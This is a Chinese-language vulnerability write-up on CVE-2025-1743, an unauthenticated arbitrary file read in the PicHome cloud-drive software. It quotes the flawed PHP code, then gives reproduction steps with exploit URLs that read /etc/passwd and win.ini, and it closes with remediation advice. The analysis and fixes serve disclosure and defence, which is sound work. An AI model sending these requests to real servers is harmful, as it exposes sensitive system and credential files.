CVE-2025-1743 PicHome 前台任意文件读取漏洞分析<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2025-1743
影响产品<\/strong>: PicHome 开源网盘程序
漏洞类型<\/strong>: 前台任意文件读取
危害等级<\/strong>: 高危
影响版本<\/strong>: 漏洞披露时所有版本<\/p>
PicHome 是一款功能强大的开源网盘程序，具有文件管理、图像和媒体文件管理、文件共享和AI辅助管理等功能。<\/p>

漏洞描述<\/h2>
PicHome 系统中存在一个前台任意文件读取漏洞，攻击者无需认证即可通过构造特殊请求读取服务器上的任意文件，可能导致敏感信息泄露。<\/p>
技术分析<\/h2>
1. 路由机制分析<\/h3>
PicHome 采用典型的基于钩子(Hook)和路由的应用程序初始化流程，类似于Discuz!、WordPress等系统：<\/p>

请求首先进入 index.php<\/code><\/li>
包含 \/data\/cache\/route.php<\/code><\/li>
检查 route.php<\/code> 中是否存在 pathinfo<\/code> 数组<\/li>
如果不存在，则包含 \/core\/dzzstart.php<\/code><\/li>
dzzstart.php<\/code> 进一步包含 \/core\/VBase.php<\/code><\/li> <\/ol> 路由格式<\/strong>: index.php?mod=模块名(文件名)&op=函数名<\/code><\/p> 2. 漏洞位置<\/h3> 漏洞位于 \/dzz\/textviewer\/index.php<\/code> 文件中，通过以下路由访问： index.php?mod=textviewer&op=index<\/code><\/p> 3. 漏洞代码分析<\/h3> 关键漏洞代码如下：<\/p> \/\/ 在\/dzz\/textviewer\/index.php中 <\/span><\/span><\/span><\/span>if<\/span>(isset<\/span>($_GET['src'<\/span>])) { <\/span><\/span> $src =<\/span> urldecode<\/span>($_GET['src'<\/span>]); <\/span><\/span> $content =<\/span> file_get_contents<\/span>($src); <\/span><\/span> \/\/ ...后续处理... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因：<\/p> 直接接收用户输入的 src<\/code> 参数<\/li> 仅进行URL解码后直接传递给 file_get_contents()<\/code><\/li> 无任何路径限制或过滤措施<\/li> <\/ol> 4. 利用方式<\/h3> 攻击者可以构造以下URL读取任意文件：<\/p> Windows系统: \/index.php?mod=textviewer&op=index&src=C:\/windows\/win.ini<\/code><\/li> Linux系统: \/index.php?mod=textviewer&op=index&src=\/etc\/passwd<\/code><\/li> <\/ul> 漏洞复现<\/h2> 复现步骤<\/h3> 搭建PicHome环境<\/li> 访问以下URL之一： Windows: http:\/\/target\/index.php?mod=textviewer&op=index&src=C:\/windows\/win.ini<\/code><\/li> Linux: http:\/\/target\/index.php?mod=textviewer&op=index&src=\/etc\/passwd<\/code><\/li> <\/ul> <\/li> 观察返回内容，确认是否读取到目标文件<\/li> <\/ol> 复现截图<\/h3> [此处应插入复现成功的截图]<\/p> 修复建议<\/h2> 输入验证<\/strong>:<\/p> 对 src<\/code> 参数进行严格过滤<\/li> 限制只能访问特定目录下的文件<\/li> <\/ul> <\/li> 路径检查<\/strong>:<\/p> $allowed_path =<\/span> '\/var\/www\/pichome\/uploads\/'<\/span>; <\/span><\/span>$src =<\/span> realpath<\/span>(urldecode<\/span>($_GET['src'<\/span>])); <\/span><\/span>if<\/span>(strpos<\/span>($src, $allowed_path) !==<\/span> 0<\/span>) { <\/span><\/span> die<\/span>('Access denied'<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 使用白名单<\/strong>:<\/p> 只允许特定的文件扩展名<\/li> 维护可访问文件的白名单<\/li> <\/ul> <\/li> 权限控制<\/strong>:<\/p> 即使修复后也应确保web服务器用户权限最小化<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> CVE-2025-1743漏洞源于PicHome系统中对用户输入缺乏充分验证，直接使用file_get_contents()<\/code>读取任意文件路径。这类漏洞危害性高，攻击者可能读取服务器上的敏感文件（如配置文件、密码文件等），建议用户及时更新到修复版本或按照上述建议进行手动修复。<\/p>